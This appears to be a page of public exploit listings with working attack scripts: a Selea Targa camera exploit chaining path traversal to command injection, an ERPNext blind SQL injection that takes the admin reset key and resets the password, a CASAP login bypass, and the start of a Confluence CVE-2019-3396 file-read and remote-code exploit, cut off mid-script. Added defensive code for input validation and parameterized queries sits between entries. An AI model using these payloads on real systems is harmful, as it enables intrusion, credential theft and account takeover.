#                          Targa 512
#                          Targa 504
#                          Targa Semplice
#                          Targa 704 TKM
#                          Targa 805
#                          Targa 710 INOX
#                          Targa 750
#                          Targa 704 ILB
#                   Firmware: BLD201113005214
#                             BLD201106163745
#                             BLD200304170901
#                             BLD200304170514
#                             BLD200303143345
#                             BLD191118145435
#                             BLD191021180140
#                             BLD191021180140
#                   CPS: 4.013(201105)
#                        3.100(200225)
#                        3.005(191206)
#                        3.005(191112)
#
# Summary: IP camera with optical character recognition (OCR) software for automatic
# number plate recognition (ANPR) also equipped with ADR system that enables it to read
# the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number
# of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number
# plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes
# this camera suitable for all installation conditions. Its built-in OCR software works
# as an automatic and independent system without the need of a computer, thus giving
# autonomy to the device even in the event of an interruption in the connection between
# the camera and the operations centre.
#
# Desc: Selea suffers from an authenticated command injection vulnerability. This can be
# exploited to inject and execute arbitrary shell commands as the www-data user through
# the 'addr' and 'port' HTTP GET parameters in the utils.php page. By chaining it with the
# unauthenticated LFI issue, an attacker can grab credentials, authenticate and execute
# system commands.
#
# =====================================================================================
# /mnt/app/scripts/address_check.sh:
# ----------------------------------
#
#   #!/bin/sh
#   . /mnt/app/scripts/env.sh
#   . /mnt/app/scripts/log.sh
#
#   CMD="$1"
#   ADDR="$2"
#   PORT="$3"
#
#   if [ "$CMD" == "ping" ]; then
#     RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 )
#   elif [ "$CMD" == "port" ]; then
#     log "/usr/bin/nc -w 1 -v -z $ADDR $PORT"
#     RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 )
#   fi
#
#   echo -e "$RESULT"
#
# =====================================================================================
#
# Tested on: GNU/Linux 3.10.53 (armv7l)
#            PHP/5.6.22
#            selea_httpd
#            HttpServer/0.1
#            SeleaCPSHttpServer/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5620
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5620.php
#
#
# 07.11.2020
#
#
# PoC chained exploit (as admin):
#
# solidsnake@metalgear:~/prive$ ./selea.sh 192.168.1.17 id
# Password found: testingus
# Using Authorization: YWRtaW46dGVzdGluZ3VzCg==
# Using command: id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
#

IP=$1
CMD=$2

PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'`
echo 'Password found: '${PWD}

AUTH=$(echo admin:${PWD} | base64)
echo 'Using Authorization: '${AUTH}
echo 'Using command: '${CMD}

curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '1.3.3.7\K.*?(?=")'
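The quoted address_check.sh double-quotes "$ADDR" and "$PORT" in its own ping and nc calls, so the injection in the advisory does not happen there; it happens wherever utils.php hands the raw 'addr' value to a shell, and the unquoted `log "... $ADDR $PORT"` line shows how easily a second expansion creeps in. The defence is to accept only values that can be an address at all, and to pass them as argv entries rather than through a shell. The following is an added example of that front-end check, written for this page and not taken from Selea's firmware; the script path is the one quoted above, while the command names, regexes and function names are this example's assumptions.

```python
# Added example (not Selea's code): strict validation of 'addr' and 'port'
# before they reach a helper such as address_check.sh, and argv-only execution.
import ipaddress
import re
import subprocess

ADDRESS_CHECK = "/mnt/app/scripts/address_check.sh"   # path quoted in the advisory
ALLOWED_CMDS = {"ping", "port"}                        # the two branches that script has

# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(r"(?:%s\.)*%s\.?" % (_LABEL, _LABEL))
PORT_RE = re.compile(r"[0-9]{1,5}")


def valid_address(addr):
    """Accept only an IP literal or an RFC 1123 hostname of at most 253 characters."""
    if not isinstance(addr, str) or not 0 < len(addr) <= 253:
        return False
    try:
        ipaddress.ip_address(addr)
        return True
    except ValueError:
        # fullmatch (not match) so a trailing newline or '$(...)' cannot slip past
        return HOSTNAME_RE.fullmatch(addr) is not None


def valid_port(port):
    """Accept an ASCII decimal string in 1..65535 (no signs, spaces or port 0)."""
    return (isinstance(port, str) and PORT_RE.fullmatch(port) is not None
            and 1 <= int(port) <= 65535)


def build_argv(cmd, addr, port=None):
    """
    Build the argv for address_check.sh or raise ValueError. A list passed
    with shell=False is never re-parsed by a shell, and the grammar check
    means '$(...)' or ';' cannot reach the script's own unquoted log line.
    """
    if cmd not in ALLOWED_CMDS:
        raise ValueError("unknown check type %r" % (cmd,))
    if not valid_address(addr):
        raise ValueError("address %r is not an IP literal or hostname" % (addr,))
    argv = [ADDRESS_CHECK, cmd, addr]
    if cmd == "port":
        if not valid_port(port):
            raise ValueError("port %r is not in 1-65535" % (port,))
        argv.append(port)
    return argv


def is_safe_request(cmd, addr, port=None):
    """Boolean form of build_argv, for use as a request guard."""
    try:
        build_argv(cmd, addr, port)
        return True
    except ValueError:
        return False


def run_address_check(cmd, addr, port=None):
    """Validate first, then execute with shell=False and a timeout; never string-concatenate."""
    argv = build_argv(cmd, addr, port)
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=10).stdout


if __name__ == "__main__":
    # Constructed inputs: a legitimate port check and the injection shape from the PoC
    print(build_argv("port", "1.3.3.7", "80"))
    print(is_safe_request("port", "1.3.3.7$(id)", "80"))
```

Keeping the grammar check even when using argv is deliberate: the helper script is a shell script, and anything it does with the value (logging, echo -e, a later unquoted expansion) is outside the caller's control, so the caller should hand it only strings that are unambiguously addresses.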
-
ERPNext 12.14.0 - SQL Injection (Authenticated)
# Exploit Title: ERPNext 12.14.0 - SQL Injection (Authenticated)
# Date: 21-01-21
# Exploit Author: Hodorsec
# Vendor Homepage: http://erpnext.org
# Software Link: https://erpnext.org/download
# Version: 12.14.0
# Tested on: Ubuntu 18.04

#!/usr/bin/python3
# AUTHENTICATED SQL INJECTION VULNERABILITY
# In short:
# Found an authenticated SQL injection when authenticated as a low-privileged user as the parameters "or_filter" and "filters" are not being sanitized sufficiently. Although several sanitation and blacklist attempts are used in the code for other parameters, these parameters aren't checked. This allows, for example, a retrieval of the admin reset token and reset the admin account using a new password as being shown in the PoC.
#
# Longer story:
# Via the "frappe.model.db_query.get_list" CMD method, it's possible to abuse the "or_filters" parameter to successfully exploit a blind time-based SQL injection using an array/list as parameter using '["{QUERY}"]', where {QUERY} is any unfiltered SQL query.
# The "or_filters" parameter is used as part of the SELECT query, along with parameters "fields", "order_by", "group_by" and "limit". When entering any subselect in the "or_filters" or "filters" parameter, no checks are being made if any blacklisted word is being used.
# Initially, the requests were performed using the HTTP POST method which checks for a CSRF token. However, converting the request to an HTTP GET method, the CSRF token isn't required nor checked.
# Test environment:
# Tested against the latest development OVA v12 and updated using 'bench update', which leads to Frappe / ERPNext version v12.14.0.
# Cause:
# In "apps/frappe/frappe/model/db_query.py" the HTTP parameters "filters" and "or_filters" aren't being sanitized sufficiently.

# STEPS NOT INCLUDED IN SCRIPT DUE TO MAILSERVER DEPENDENCY
# 1. Create account
# 1.a. Use update-password link for created user received via mail

# STEPS INCLUDED IN SCRIPT
# 1. Login using existing low-privileged account
# 2. Use SQL Injection vulnerability in "frappe/frappe/model/db_query/get_list" function by not sanitizing parameters "filters" and "or_filters" sufficiently
# 3. Retrieve reset key for admin user
# 4. Reset admin account using given password

# DEMONSTRATION
# $ python3 poc_erpnext_12.14.0_auth_sqli_v1.0.py [email protected] passpass1234@ admin password123411111 http://192.168.252.8/ 2
# [*] Got an authenticated session, continue to perform SQL injection...
# [*] Retrieving 1 row of data using username 'admin' column 'name' and 'tabUser' as table...
# [email protected]
# [*] Retrieved value '[email protected]' for username 'admin' column 'name' in row 1
# [*] Sent reset request for '[email protected]
# [*] Retrieving 1 row of data using username 'admin' column 'reset_password_key' and 'tabUser' as table...
# xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX
# [*] Retrieved value 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX' for username 'admin' column 'reset_password_key' in row 1
# [+] Retrieved email '[email protected]' and reset key 'xPjkMvdbRhdFdBi0l70jYQmTDNj8G9zX'
# [+} RESETTED ACCOUNT '[email protected]' WITH NEW PASSWORD 'password123=411111!
#
# [+] Done!

import requests
import urllib3
import os
import sys
import re

# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy

# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set timeout
timeout = 30

# Injection prefix and suffix
inj_prefix = "[\"select(sleep("
inj_suffix = "))))\"]"

# Decimal begin and end
dec_begin = 48
dec_end = 57

# ASCII char begin and end
ascii_begin = 32
ascii_end = 126

# Handle CTRL-C
def keyboard_interrupt():
    """Handles keyboardinterrupt exceptions"""
    print("\n\n[*] User requested an interrupt, exiting...")
    exit(0)

# Custom headers
def http_headers():
    headers = {
        'User-Agent': "Mozilla",
    }
    return headers

# Get an authenticated session
def get_session(url,headers,email,password):
    data = {'cmd':'login',
            'usr':email,
            'pwd':password,
            'device':'desktop'}
    session = requests.session()
    r = session.post(url,headers=headers,data=data,timeout=timeout,allow_redirects=True,verify=False)
    if "full_name" in r.text:
        return session
    else:
        print("[!] Unable to get an authenticated session, check credentials...")
        exit(-1)

# Perform the SQLi call for injection
def sqli(url,session,headers,inj_str,sleep):
    comment_inj_str = re.sub(" ","+",inj_str)
    inj_params = {'cmd':'frappe.model.db_query.get_list',
                  'filters':'["idx=1"]',
                  'or_filters':inj_str,
                  'fields':'idx',
                  'doctype':'Report',
                  'order_by':'idx',
                  'group_by':'idx'}
    # inj_params[param] = comment_inj_str
    inj_params_unencoded = "&".join("%s=%s" % (k,v) for k,v in inj_params.items())

    # Do GET
    r = session.get(url,params=inj_params,headers=headers,timeout=timeout,verify=False)
    res = r.elapsed.total_seconds()
    if res >= sleep:
        return True
    elif res < sleep:
        return False
    else:
        print("[!] Something went wrong checking responses. Check responses manually. Exiting.")
        exit(-1)

# Loop through positions and characters
def get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep):
    extracted = ""
    max_pos_len = 35

    # Loop through length of string
    # Not very efficient, should use a guessing algorithm
    for pos in range(1,max_pos_len):
        # Test if current pos does have any valid value. If not, break
        direction = ">"
        inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(ascii_begin) + ",0," + str(sleep) + inj_suffix + suffix
        if not sqli(url,session,headers,inj_str,sleep):
            break

        # Loop through ASCII printable characters
        direction = "="
        for guess in range(ascii_begin,ascii_end+1):
            extracted_char = chr(guess)
            inj_str = prefix + inj_prefix + str(sleep) + "-(if(ord(mid((select ifnull(cast(" + column + " as NCHAR),0x20) from " + table + " where username = '" + username + "' LIMIT " + str(row) + ",1)," + str(pos) + ",1))" + direction + str(guess) + ",0," + str(sleep) + inj_suffix + suffix
            if sqli(url,session,headers,inj_str,sleep):
                extracted += chr(guess)
                print(extracted_char,end='',flush=True)
                break
    return extracted

def forgot_password(url,headers,sqli_email):
    data = {'cmd':'frappe.core.doctype.user.user.reset_password',
            'user':sqli_email}
    r = requests.post(url,headers=headers,data=data,verify=False,allow_redirects=False,timeout=timeout)
    if "Password reset instructions have been sent to your email" in r.text:
        return r

def reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
    data = {'key':sqli_reset_key,
            'old_password':'',
            'new_password':new_password,
            'logout_all_sessions':'0',
            'cmd':'frappe.core.doctype.user.user.update_password'}
    r = requests.post(url,headers=headers,data=data,verify=False,allow_redirects=False,timeout=timeout)
    if r.status_code == 200:
        return r

# Main
def main(argv):
    if len(sys.argv) == 7:
        email = sys.argv[1]
        password = sys.argv[2]
        username = sys.argv[3]
        new_password = sys.argv[4]
        url = sys.argv[5]
        sleep = int(sys.argv[6])
    else:
        print("[*] Usage: " + sys.argv[0] + " <email_login> <passw_login> <username_to_reset> <new_password> <url> <sleep_in_seconds>")
        print("[*] Example: " + sys.argv[0] + " [email protected] passpass1234@ admin password1234@ http://192.168.252.8/ 2\n")
        exit(0)

    # Random headers
    headers = http_headers()

    # Sleep divide by 2 due to timing caused by specific DBMS query
    sleep = sleep / 2

    # Optional prefix / suffix
    prefix = ""
    suffix = ""

    # Tables / columns / values
    table = 'tabUser'
    columns = ['name','reset_password_key']
    sqli_email = ""
    sqli_reset_key = ""

    # Rows
    rows = 1

    # Do stuff
    try:
        # Get an authenticated session
        session = get_session(url,headers,email,password)
        if session:
            print("[*] Got an authenticated session, continue to perform SQL injection...")

        # Getting values for found rows in specified columns
        for column in columns:
            print("[*] Retrieving " + str(rows) + " row of data using username '" + username + "' column '" + column + "' and '" + table + "' as table...")
            for row in range(0,rows):
                retrieved = get_data(url,session,headers,prefix,suffix,row,column,table,username,sleep)
                print("\n[*] Retrieved value '" + retrieved + "' for username '" + username + "' column '" + column + "' in row " + str(row+1))
                if column == 'name':
                    sqli_email = retrieved
                    # Generate a reset token in database
                    if forgot_password(url,headers,sqli_email):
                        print("[*] Sent reset request for '" + sqli_email + "'")
                    else:
                        print("[!] Something went wrong sending a reset request, check requests or listening mail server...")
                        exit(-1)
                elif column == 'reset_password_key':
                    sqli_reset_key = retrieved

        # Print retrieved values
        print("[+] Retrieved email '" + sqli_email + "' and reset key '" + sqli_reset_key + "'")

        # Reset the desired account
        if reset_account(url,headers,sqli_email,sqli_reset_key,new_password):
            print("[+} RESETTED ACCOUNT '" + sqli_email + "' WITH NEW PASSWORD '" + new_password + "'")
        else:
            print("[!] Something went wrong when attempting to reset account, check requests: perhaps password not complex enough?")
            exit(-1)

        # Done
        print("\n[+] Done!\n")

    except requests.exceptions.Timeout:
        print("[!] Timeout error\n")
        exit(-1)
    except requests.exceptions.TooManyRedirects:
        print("[!] Too many redirects\n")
        exit(-1)
    except requests.exceptions.ConnectionError:
        print("[!] Not able to connect to URL\n")
        exit(-1)
    except requests.exceptions.RequestException as e:
        print("[!] " + str(e))
        exit(-1)
    except requests.exceptions.HTTPError as e:
        print("[!] Failed with error code - " + str(e.code) + "\n")
        exit(-1)
    except KeyboardInterrupt:
        keyboard_interrupt()
        exit(-1)

# If we were called as a program, go execute the main function.
if __name__ == "__main__":
    main(sys.argv[1:])

# Timeline:
# 22-12-20: Sent initial description and PoC via https://erpnext.com/security
# 08-01-21: No reply nor response received, sent reminder via same form. Sent Twitter notifications.
# 21-01-21: No response received, public disclosure
-
CASAP Automated Enrollment System 1.0 - Authentication Bypass
# Exploit Title: CASAP Automated Enrollment System 1.0 - Authentication Bypass
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip
# Version: 1.0
# Tested On: Ubuntu + XAMPP 7.4.4
# Description: CASAP Automated Enrollment System 1.0 - Authentication Bypass Using SQLi

#STEP 1 : Run The Exploit With This Command : python3 exploit.py <URL>
#         For Example: python3 exploit.py http://10.9.67.23/final/
#STEP 2 : Open the Link Provided At The End After Successful Authentication Bypass in Browser.

import time
import sys
import requests

YELLOW = '\033[33m'  # Yellow Text
GREEN = '\033[32m'   # Green Text
RED = '\033[31m'     # Red Text
RESET = '\033[m'     # reset to the defaults

print(YELLOW+' _ ______ _ _ ___ ', RESET)
print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
print(YELLOW+" ", RESET)
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('!!!        CASAP AUTOMATED ENROLLMENT SYSTEM 1.0       !!!')
print('!!!               AUTHENTICATION BYPASS                !!!')
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
print('Author - Himanshu Shukla')

def authbypass(url):
    #Authentication Bypass
    s = requests.Session()
    #Set Cookie
    cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
    print ("[*]Attempting Authentication Bypass...")
    time.sleep(1)
    values = {"username":"'or 1 or'","password":""}
    r=s.post(url+'login.php', data=values, cookies=cookies)
    p=s.get(url+'dashboard.php', cookies=cookies)
    #Check if Authentication was bypassed or not.
    logged_in = True if ("true_admin" in r.text) else False
    l=logged_in
    if l:
        print(GREEN+"[+]Authentication Bypass Successful!", RESET)
        print(YELLOW+"[+]Open This Link To Continue As Admin : "+url+"dashboard.php", RESET)
    else:
        print(RED+"[-]Failed To Authenticate!", RESET)
        print(RED+"[-]Check Your URL", RESET)

if __name__ == "__main__":
    if len(sys.argv)!=2:
        print(RED+"You Haven't Provided any URL!", RESET)
        print("Usage : python3 exploit.py <URL>")
        print("Example : python3 exploit.py http://10.9.7.3/final/")
        exit()
    try:
        authbypass(sys.argv[1])
    except:
        print(RED+"[-]Invalid URL!", RESET)
        exit()
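Three of the entries on this page are the same defect in different clothes: the Library System and CASAP bypasses submit the literal `'or 1 or'` as a username so that a string-built `WHERE username='...'` becomes `username='' or 1 or ''`, and the ERPNext PoC passes a whole subselect through a "filters"/"or_filters" parameter that the server splices into its SELECT. The block below is an added example written for this page (not code from any of these three exploits or their vendors) that runs the bypass value against a string-built query and a parameterized one on an in-memory SQLite table with constructed rows, and then shows a filter builder that accepts only `[field, operator, value]` triples from allowlists and binds every value, which is the shape a get_list style endpoint needs if it is to take structured filters from a client. The table, column and operator allowlists are assumptions for the example.

```python
# Added example (not from the exploits above): the string-built login query
# behind a "'or 1 or'" bypass beside its parameterized form, plus an
# allowlisting filter builder for get_list style endpoints.
import sqlite3

BYPASS = "'or 1 or'"   # the value the Library System / CASAP exploits submit

# Assumed schema allowlists: the only column names and operators a client may name.
ALLOWED_FIELDS = {"name", "username", "reset_password_key"}
ALLOWED_OPS = {"=", "!=", "like", ">", "<"}


def make_db():
    """In-memory sample database with constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tabUser (name TEXT, username TEXT, reset_password_key TEXT)")
    db.executemany("INSERT INTO tabUser VALUES (?, ?, ?)", [
        ("admin@example.net", "admin", "RESET-KEY-PLACEHOLDER"),
        ("alice@example.net", "alice", ""),
    ])
    return db


def login_vulnerable(db, username):
    """String-built query: the submitted value becomes part of the SQL text."""
    sql = "SELECT username FROM tabUser WHERE username='%s'" % username
    return [row[0] for row in db.execute(sql)]


def login_fixed(db, username):
    """Bound parameter: the value is data, whatever characters it contains."""
    return [row[0] for row in db.execute(
        "SELECT username FROM tabUser WHERE username=?", (username,))]


def build_where(filters=(), or_filters=()):
    """
    Turn [field, operator, value] triples into (where_sql, params). Fields and
    operators must come from the allowlists and values are always bound, so a
    bare string carrying a subselect raises instead of being spliced in.
    """
    def group(items, joiner):
        parts, params = [], []
        for item in items:
            if not (isinstance(item, (list, tuple)) and len(item) == 3):
                raise ValueError("filter must be [field, operator, value]: %r" % (item,))
            field, op, value = item
            op = str(op).lower()
            if field not in ALLOWED_FIELDS:
                raise ValueError("field not allowed: %r" % (field,))
            if op not in ALLOWED_OPS:
                raise ValueError("operator not allowed: %r" % (op,))
            parts.append('"%s" %s ?' % (field, op))   # both pieces come from allowlists
            params.append(value)
        return "(" + joiner.join(parts) + ")", params

    clauses, params = [], []
    for items, joiner in ((filters, " AND "), (or_filters, " OR ")):
        if items:
            sql, p = group(items, joiner)
            clauses.append(sql)
            params.extend(p)
    return (" AND ".join(clauses) if clauses else "1=1"), params


def get_list(db, fields, filters=(), or_filters=()):
    """Allowlisted SELECT in the style of a get_list endpoint."""
    bad = [f for f in fields if f not in ALLOWED_FIELDS]
    if bad:
        raise ValueError("field not allowed: %r" % (bad,))
    where, params = build_where(filters, or_filters)
    sql = "SELECT %s FROM tabUser WHERE %s" % (", ".join('"%s"' % f for f in fields), where)
    return db.execute(sql, params).fetchall()


def filters_ok(filters=(), or_filters=()):
    """True when build_where accepts the filters; usable as a request guard."""
    try:
        build_where(filters, or_filters)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    db = make_db()
    print("string-built:", login_vulnerable(db, BYPASS))   # every row matches
    print("parameterized:", login_fixed(db, BYPASS))       # no row matches
    print(get_list(db, ["name"], filters=[["username", "=", "admin"]]))
    print(filters_ok(or_filters=['["select(sleep(2))"]']))  # the ERPNext PoC's shape
```

The point of build_where is that a client can still express rich queries, but never contributes SQL text: the only strings that reach the query are allowlisted identifiers, and the values travel as bound parameters, which is exactly what the vendor-side blacklist approach mentioned in the ERPNext write-up failed to guarantee.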
-
Atlassian Confluence Widget Connector Macro - SSTI
# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI
# Date: 21-Jan-2021
# Exploit Author: 46o60
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin
# Version: 6.12.1
# Tested on: Ubuntu 20.04.1 LTS
# CVE : CVE-2019-3396

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
Exploit for CVE-2019-3396 (https://www.cvedetails.com/cve/CVE-2019-3396/)
Widget Connector macro in Atlassian Confluence Server server-side template injection.

Vulnerability information:
    Authors:
        Daniil Dmitriev - Discovering vulnerability
        Dmitry (rrock) Shchannikov - Metasploit module
    Exploit
        ExploitDB:
            https://www.exploit-db.com/exploits/46731
        Metasploit
            https://www.rapid7.com/db/modules/exploit/multi/http/confluence_widget_connector/
            exploit/multi/http/confluence_widget_connector

While the Metasploit module works perfectly fine, it has the limitation that to gain RCE an
outbound FTP request is made from the target Confluence server towards the attacker's server,
where the Velocity template with the payload is hosted. If this is not possible, for example
because the network where the target Confluence server is located filters all outbound
traffic, an alternative approach is needed.

This exploit, in addition to the original exploit, implements this alternative approach by
first uploading the template to the server and then loading it with the original
vulnerability from the local file system. The limitation is that to upload a file a valid
session is needed for a non-privileged user. Any user can upload a file to the server by
attaching the file to his "personal space".

There are two modes of the exploit:
    1. Exploiting path traversal for file disclosure and directory listings.
    2. RCE by uploading a template file with payload to the server.

In the case where the network is filtered and loading a remote template is not possible, and
you also do not have a low-privileged user session, you can still exploit the '_template'
parameter to browse the server file system by using the first mode of this exploit.
Conveniently, the application returns file content as well as directory listings, depending
on what the path is pointing to. As in the original exploit, no authentication is needed for
this mode.

Limitations of path traversal exploit:
    - not possible to distinguish between non-existent path and lack of permissions
    - no distinction between files and directories in the output

If you have the ability to authenticate to the server and have enough privileges to upload
files, use the second mode. A regular user probably has enough privileges for this since
each user can have their own personal space where they should be able to add attachments.
This exploit automatically finds the personal space (or creates one if it does not exist)
and attaches a file with the Velocity template payload to it. It then uses the original
vulnerability but loads the template file with the payload from the local filesystem
instead of from a remote system.

Prerequisites of RCE in this exploit:
    - authenticated session is needed
    - knowledge of where attached files are stored on the file system
        - if it is not the default location then use the first mode to find it; it should be
          in the Confluence install directory under the ./attachments subdirectory

Usage
    - list /etc folder on Confluence server hosted on http://confluence.example.com
        python exploit.py -th confluence.example.com fs /etc
    - get content of /etc/passwd on same server but through a proxy
        python exploit.py -th confluence.example.com -px http://127.0.0.1:8080 fs /etc/passwd
    - execute 'whoami' command on the same server (this will upload a template file with payload to the server using existing session)
        python exploit.py -th confluence.example.com rce -c JSESSIONID=ABCDEF123456789ABCDEF123456789AB "whoami"

Tested on Confluence versions:
    6.12.1

To test the exploit:
    1. Download Confluence trial version for version 6.12.1
        https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-6.12.1-x64.bin
        (to find this URL go to the download page for the latest version, pick LTS release Linux 64 Bit,
        turn on the browser network tools to capture HTTP traffic, click Submit, take the URL from the
        request towards 'product-downloads' and change the version in the URL to be 6.12.1)
        SHA256: 679b1c05cf585b92af9888099c4a312edb2c4f9f4399cf1c1b716b03c114e9e6  atlassian-confluence-6.12.1-x64.bin
    2. Run the binary to install it, for example on Ubuntu 20.04. Use "Express Install" and everything by default.
        chmod +x atlassian-confluence-6.12.1-x64.bin
        sudo ./atlassian-confluence-6.12.1-x64.bin
    3. Open the browser to configure the initial installation; when you get to the license window, copy the server ID.
    4. Create an account at https://my.atlassian.com/ and request a new trial license using the server ID.
    5. Activate the license and finish the installation with default options.
    6. Create a user and log in with it to go through the initial user setup and get the session id for the RCE part of the exploit.
    7. Run the exploit (see usage above).
"""

__version__ = "1.0.0"
__author__ = "46o60"

import argparse
import logging
import requests
import urllib3
from bs4 import BeautifulSoup
import re
import json
import random
import string

# script and banner
SCRIPT_NAME = "CVE-2019-3396: Confluence exploit script"
ASCII_BANNER_TEXT = """____ ____ _ _ ____ _ _ _ ____ _ _ ____ ____ ____
| | | |\ | |___ | | | |___ |\ | | | | |__/ |___
|__| | \| | |___ |__| |___ | \| |___ |__| | \ """

# turn off requests log output
urllib3.disable_warnings()
logging.getLogger("urllib3").setLevel(logging.WARNING)


def print_banner():
    """
    Prints script ASCII banner and basic information. Because it is cool.
    """
    print(ASCII_BANNER_TEXT)
    print("{} v{}".format(SCRIPT_NAME, __version__))
    print("Author: {}".format(__author__))
    print()


def exit_log(logger, message):
    """
    Utility function to log exit message and finish the script.
    """
    logger.error(message)
    exit(1)


def check_cookie_format(value):
    """
    Checks if value is in format: ^[^=]+=[^=]+$
    """
    pattern = r"^[^=]+=[^=]+$"
    if not re.match(pattern, value):
        raise argparse.ArgumentTypeError("provided cookie string does not have correct format")
    return value


def parse_arguments():
    """
    Performs parsing of script arguments.
    """
    # creating parser
    parser = argparse.ArgumentParser(
        prog=SCRIPT_NAME,
        description="Exploit CVE-2019-3396 to explore file system or gain RCE through file upload."
    )

    # general script arguments
    parser.add_argument(
        "-V", "--version",
        help="displays the current version of the script",
        action="version",
        version="{name} {version}".format(name=SCRIPT_NAME, version=__version__)
    )
    parser.add_argument(
        "-v", "--verbosity",
        help="increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity",
        action="count",
        default=0
    )
    parser.add_argument(
        "-sb", "--skip-banner",
        help="skips printing of the banner",
        action="store_true",
        default=False
    )
    parser.add_argument(
        "-s", "--silent",
        help="do not output results of the exploit to standard output",
        action="store_true",
        default=False
    )
    parser.add_argument(
        "-q", "--quiet",
        help="do not output any logs",
        action="store_true",
        default=False
    )

    # arguments for input
    parser.add_argument(
        "-px", "--proxy",
        help="proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS"
    )
    parser.add_argument(
        "-t", "--tls",
        help="use HTTPS protocol, default behaviour is to use plain HTTP",
        action="store_true"
    )
    parser.add_argument(
        "-th", "--target-host",
        help="target hostname/domain",
        required=True
    )
    parser.add_argument(
        "-p", "--port",
        help="port where the target is listening, default ports 80 for HTTP and 443 for HTTPS"
    )

    # two different sub commands
    subparsers = parser.add_subparsers(
        title="actions",
        description="different behaviours of the script",
        help="for detail description of available action options invoke -h for each individual action",
        dest="action"
    )

    # only exploring file system by disclosure of files and directories
    parser_file_system = subparsers.add_parser(
        "fs",
        help="use the exploit to browse local file system on the target endpoint"
    )
    parser_file_system.add_argument(
        "path",
        help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory"
    )
    parser_file_system.set_defaults(func=exploit_path_traversal)

    # using file upload to deploy payload and achieve RCE
    parser_rce = 
subparsers.add_parser( "rce", help="use the exploit to upload a template " ) parser_rce.add_argument( "-hd", "--home-directory", help="Confluence home directory on the server" ) parser_rce.add_argument( "-c", "--cookie", help="cookie that should be used for the session, value passed as it is in HTTP request, for example: " "-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB", type=check_cookie_format, required=True ) parser_rce.add_argument( "command", help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory" ) parser_rce.set_defaults(func=exploit_rce) # parsing arguments = parser.parse_args() return arguments class Configuration: """ Represents all supported configuration items. """ # Parse arguments and set all configuration variables def __init__(self, script_args): self.script_arguments = script_args # setting input arguments self._proxy = self.script_arguments.proxy self._target_protocol = "https" if self.script_arguments.tls else "http" self._target_host = self.script_arguments.target_host self._target_port = self.script_arguments.port if self.script_arguments.port else \ 443 if self.script_arguments.tls else 80 @staticmethod def get_logger(verbosity): """ Prepares logger to output to stdout with appropriate verbosity. """ logger = logging.getLogger() # default logging level logger.setLevel(logging.DEBUG) # Definition of logging to console ch = logging.StreamHandler() # specific logging level for console if verbosity == 0: ch.setLevel(logging.INFO) elif verbosity > 0: ch.setLevel(logging.DEBUG) # formatting class MyFormatter(logging.Formatter): default_fmt = logging.Formatter('[?] %(message)s') info_fmt = logging.Formatter('[+] %(message)s') error_fmt = logging.Formatter('[-] %(message)s') warning_fmt = logging.Formatter('[!] 
